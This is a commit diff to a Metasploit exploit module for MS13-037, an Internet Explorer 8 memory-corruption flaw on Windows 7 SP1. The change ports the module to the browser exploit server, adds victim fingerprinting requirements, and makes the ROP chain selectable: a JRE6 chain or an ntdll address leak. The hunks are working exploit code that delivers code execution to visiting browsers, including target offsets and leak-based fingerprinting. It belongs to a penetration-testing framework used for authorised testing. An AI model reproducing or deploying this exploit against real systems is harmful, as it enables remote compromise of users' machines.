Use BES for MS13-037 and default to ntdll

Author: wchen-r7

modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb

@@ -8,7 +8,7 @@
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::RopDb
   #include Msf::Exploit::Remote::BrowserAutopwn
 
@@ -61,23 +61,20 @@ def initialize(info={})
           'InitialAutoRunScript' => 'migrate -f'
         },
       'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source => /script/i,
+          :os_name => OperatingSystems::WINDOWS,
+          :ua_name => HttpClients::IE,
+          :ua_ver  => '8.0',
+        },
       'Targets'        =>
         [
-          [ 'Automatic', {} ],
-          [ 'IE 8 on Windows 7 SP1 with JRE ROP', # default
-            {
-              'Rop' => :jre,
-              'Offset' => '0x5f4'
-            }
-          ],
-          # requires:
-          # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation)
-          # * ntdll.dll v6.1.7601.17725 (MS12-001)
-          [ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak',
-            {
-              'Rop' => :ntdll,
-              'Offset' => '0x5f4'
-            }
+          [
+            'IE 8 on Windows 7 SP1',
+              {
+                'Offset' => '0x5f4'
+              }
           ]
         ],
       'Privileged'     => false,
@@ -89,40 +86,20 @@ def initialize(info={})
         OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
       ], self.class)
 
+    register_advanced_options(
+      [
+          # ntdll requires:
+          # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation)
+          # * ntdll.dll v6.1.7601.17725 (MS12-001)
+        OptEnum.new('ROP', [true, 'The type of ROP to use (JRE6 or leak NTDLL)', 'NTDLL', ['JRE6', 'NTDLL'] ])
+      ], self.class)
   end
 
   def exploit
-    @second_stage_url = rand_text_alpha(10)
+    @second_stage_url = "#{get_module_resource}#{rand_text_alpha(10)}".chomp
     @leak_param = rand_text_alpha(5)
-    super
-  end
-
-  def get_target(agent)
-    #If the user is already specified by the user, we'll just use that
-    return target if target.name != 'Automatic'
-
-    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
 
-    ie_name = "IE #{ie}"
-
-    case nt
-    when '5.1'
-      os_name = 'Windows XP SP3'
-    when '6.0'
-      os_name = 'Windows Vista'
-    when '6.1'
-      os_name = 'Windows 7'
-    end
-
-    targets.each do |t|
-      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
-        print_status("Target selected as: #{t.name}")
-        return t
-      end
-    end
-
-    return nil
+    super
   end
 
   def ie_heap_spray(my_target, p)
@@ -383,16 +360,26 @@ def html_info_leak
 
   end
 
-  def on_request_uri(cli, request)
-    agent = request.headers['User-Agent']
-    uri   = request.uri
-    print_status("Requesting: #{uri}")
+  def set_rop(t, rop, info)
+    case rop
+    when /^ntdll$/i
+      t['Rop'] = :ntdll
+    when /^jre6$/i
+      if info[:java] !~ /1\.6|6\.0/
+        raise RuntimeError, "Target does not have the suitable Java component installed for our attack"
+      end
+
+      t['Rop'] = :jre
+    end
+
+    return t
+  end
 
-    my_target = get_target(agent)
-    # Avoid the attack if no suitable target found
-    if my_target.nil?
-      print_error("Browser not supported, sending 404: #{agent}")
-      send_not_found(cli)
+  def on_request_exploit(cli, request, target_info)
+    begin
+      my_target = set_rop(get_target, datastore['ROP'], target_info)
+    rescue RuntimeError => e
+      print_error(e.message)
       return
     end
 
@@ -414,7 +401,7 @@ def on_request_uri(cli, request)
         return
       end
 
-      vprint_status("ntdll leak: 0x#{leak.to_s(16)}")
+      print_status("ntdll leak: 0x#{leak.to_s(16)}")
       fingerprint = leak & 0x0000ffff
 
       case fingerprint